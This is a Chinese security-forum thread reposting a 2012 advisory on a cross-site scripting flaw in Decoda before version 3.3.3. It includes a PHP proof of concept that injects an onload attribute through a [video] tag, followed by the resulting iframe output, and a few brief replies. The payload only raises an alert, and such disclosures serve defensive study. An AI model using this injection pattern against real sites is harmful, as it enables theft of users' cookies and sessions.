查看: 11010|回复: 4

Decoda跨站脚本漏洞

[复制链接]
发表于 2012-5-18 12:23:57 | 显示全部楼层 |阅读模式
Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。

目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本

可用以下的概念证明型攻击:
  1. <?php
  2. include '../decoda/Decoda.php';
  3. $code = new Decoda();
  4. $code->addFilter(new VideoFilter()); ?>
  5. <?php

  6. $decoda_markup = '[video="youtube" size="small"]"';
  7. $decoda_markup .= 'onload="alert(\'08sec Pentesting XSS\');" id="[/video]';

  8. $code->reset($decoda_markup);
  9. echo $code->parse();
  10. ?>

  11. This results in the following output (whitespace adjusted):

  12. <iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
  13. Pentesting XSS');" id="" width="560" height="315"
  14. frameborder="0"></iframe>
复制代码
回复

使用道具 举报

发表于 2012-5-23 23:57:21 | 显示全部楼层
Decoda跨站脚本漏洞
回复 支持 反对

使用道具 举报

raven4310 该用户已被删除
发表于 2012-5-26 00:37:11 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2012-5-29 11:52:31 | 显示全部楼层
谢谢分享, 学习ing
回复 支持 反对

使用道具 举报

发表于 2012-9-15 16:18:47 来自手机 | 显示全部楼层
k红颜 发表于 2012-5-23 23:57
Decoda跨站脚本漏洞

看看学习下。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:08 , Processed in 0.018889 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部